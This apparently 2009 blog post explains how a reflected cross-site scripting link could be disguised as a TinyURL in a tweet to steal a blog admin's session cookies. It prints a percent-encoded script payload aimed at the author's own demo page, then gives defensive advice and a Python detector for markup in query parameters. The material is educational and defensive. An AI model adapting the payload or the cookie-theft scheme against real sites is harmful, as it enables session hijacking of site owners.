Archive for the ‘Cross Site Scripting (XSS)’ category

Twitter… and the dangers within..

September 3rd, 2009

Twitter has taken the social networking crowd by storm. Apparently originally used for friends to send small status notifications (tweets) to each other, it has now become a major avenue for businesses, internet marketers and bloggers alike to drive traffic to their sites and goals. However, Twitter also presents an interesting vector for malicious hackers to deliver Cross Site Scripting (XSS) attacks to their targets.

Recently a mate of mine was showing me an application (www.twitterfeed.com) that automatically tweets your blog feeds. He sent me to one of his many twitter feeds to show me how it works. Now I am not exactly what you would call a twitter fan and as a result I haven’t spent much time on the site. The first thing that struck me was that the page was completely full of short URL aliases, also known as TinyURLs amongst other names (I’ll refer to them as TinyURLs from here on in).

Naturally, my spidey senses started tingling….
Before we go on, let’s look at the information the attacker already has on their potential target:

  • The twitter feed is updated through a blog or forum of which the tweeter is probably the admin.
  • The admin has probably logged on recently and quite possibly has a current session key.
  • We can make the assumption that the admin is desensitized to seeing TinyURLs and clicking them and/or doesn’t realise the dangers.

The stage is set…
The attacker has located an XSS vulnerability in the target’s favourite blog/forum software application, but what can he do with it? Well, he might use this vulnerability for many things, including cookie stealing, targeted site defacement, or calling his own malicious JavaScript.

Now he needs to create his malicious payload. Let’s say that the malicious hacker has set up a website that captures any cookies passed to it through a malicious JavaScript file called cookiestealer.js.

He creates a URL like the one below and uses it in a response tweet to the target. This is an attempt to coax the target into clicking through. As you can see, he takes advantage of the XSS vulnerability by calling the attacker’s nasty cookiestealer.js script from within the legitimate www.yoursite.com request.

http://www.yoursite.com/members.php?

So would you click this link?
You may or may not, but the chances are against the attacker at this stage.
So maybe he attempts to obfuscate it like this? Note: this URL is a live XSS example. Using this link will display an alert popup using code that was not coded into the website.

http://www.damiangrace.com/xss.php?xss=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%54%77%69%74%74%65%72%20%69%73%20%44%61%6E%67%65%72%6F%75%73%21%21%21%20%57%65%20%63%6F%75%6C%64%20%68%61%76%65%20%6A%75%73%74%20%73%74%6F%6C%65%6E%20%79%6F%75%72%20%63%6F%6F%6B%69%65%73%20%61%6E%64%20%6D%6F%72%65%2E%20%4C%65%61%72%6E%20%6D%6F%72%65%20%61%74%20%68%74%74%70%3A%2F%2F%77%77%77%2E%64%61%6D%69%61%6E%67%72%61%63%65%2E%63%6F%6D%2F%22%29%3C%2F%73%63%72%69%70%74%3E

So the victim is much more likely to click on this link, right? However it still does look a little strange. But what if the attacker was to make it look exactly like a twitter link? Something like this maybe:

http://tinyurl.com/l3tjkv

Do you think they will click on it now? My guess is yes!

Now the user/admin clicks on the link and the attacker is automatically fed the target’s cookies and can now control the target website with the same permission levels.

Scary huh???

So now that you know about it… How can you stop being a victim?

  1. Well, don’t go clicking on TinyURLs all willy-nilly.
  2. Utilize the ‘preview’ features of the TinyURL sites. Example: http://tinyurl.com/preview.php?enable=1
  3. Log out of sites that require sign-on when you are finished (Closing the browser does not have the same effect).
  4. Don’t allow the browser to auto-login to sites.
  5. Upgrade to a Modern Internet Explorer version that supports XSS prevention or use Firefox with the NoScript add-on installed.
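The percent-encoded link above only looks strange because the browser never shows you the decoded form. The following is an added example (my own code, not something from the post or from any TinyURL site) of the check a link preview or a log reviewer can run: it decodes every query parameter, repeating the decode so double encoding does not hide anything, flags values that carry HTML or script markup, and shows what a reflecting page like the demo’s xss.php should have emitted instead. The demo URL is the one quoted in the post; the benign and double-encoded URLs are constructed for the test.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The live demo link quoted in the post, split into chunks for readability.
DEMO_URL = (
    "http://www.damiangrace.com/xss.php?xss="
    "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22"
    "%54%77%69%74%74%65%72%20%69%73%20"
    "%44%61%6E%67%65%72%6F%75%73%21%21%21%20"
    "%57%65%20%63%6F%75%6C%64%20%68%61%76%65%20"
    "%6A%75%73%74%20%73%74%6F%6C%65%6E%20"
    "%79%6F%75%72%20%63%6F%6F%6B%69%65%73%20"
    "%61%6E%64%20%6D%6F%72%65%2E%20"
    "%4C%65%61%72%6E%20%6D%6F%72%65%20%61%74%20"
    "%68%74%74%70%3A%2F%2F%77%77%77%2E"
    "%64%61%6D%69%61%6E%67%72%61%63%65%2E%63%6F%6D%2F"
    "%22%29%3C%2F%73%63%72%69%70%74%3E"
)

# Markup that has no business in a query parameter: an opening or closing
# tag, a javascript: URL, or an inline event handler attribute (on...=).
INJECTION_RE = re.compile(r"</?[a-z][a-z0-9]*[\s>/]|javascript\s*:|\bon[a-z]+\s*=", re.I)


def fully_unquote(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_query(url: str) -> dict:
    """Return every query parameter with its fully decoded value."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {name: fully_unquote(value) for name, value in pairs}


def find_html_injection(url: str) -> list:
    """Names of parameters whose decoded value carries HTML/script markup."""
    return [name for name, value in decode_query(url).items() if INJECTION_RE.search(value)]


def render_safely(value: str) -> str:
    """What a reflecting page should emit: entity-encoded text, never raw HTML."""
    return html.escape(value, quote=True)
```

Run `find_html_injection` over the expanded form of a short link before deciding whether to click it; the `xss` parameter of the demo URL is flagged, while an ordinary members.php link with numeric and plain-text parameters is not.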

Have you experienced any strange events after clicking on a twitter link before?
